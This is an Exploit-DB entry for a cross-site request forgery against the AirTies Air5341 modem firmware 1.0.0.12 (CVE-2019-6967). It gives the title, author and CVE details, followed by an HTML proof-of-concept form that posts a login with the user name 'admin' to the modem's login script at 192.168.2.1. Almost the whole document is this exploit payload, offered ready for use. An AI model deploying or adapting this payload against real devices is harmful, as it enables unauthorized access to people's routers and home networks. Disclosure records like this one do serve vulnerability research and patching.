AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery

EDB-ID:

46253




Platform:

Hardware

Date:

2019-01-28


# Exploit Title: AirTies Air5341 1.0.0.12 Modem CSRF Exploit & PoC
# Version: AirTies Modem Firmware 1.0.0.12
# Tested on: Windows 10 x64
# CVE : CVE-2019-6967
# Author : Ali Can Gönüllü

<html>
<form method="POST" name="formlogin" action="
http://192.168.2.1/cgi-bin/login" target="_top" id="uiPostForm">
       <input type="hidden" id="redirect" name="redirect">
       <input type="hidden" id="self" name="self">
       <input name="user" type="text" id="uiPostGetPage" value="admin"
size="">
       <input name="password" type="password" id="uiPostPassword" size="">
<input onclick="uiDologin();" name="gonder" type="submit"
class="buton_text" id="__ML_ok" value="TAMAM"
style="background-image:url(images/buton_bg2.gif); height:21px;
width:110px; border: 0pt  none">
      </form>
      </html>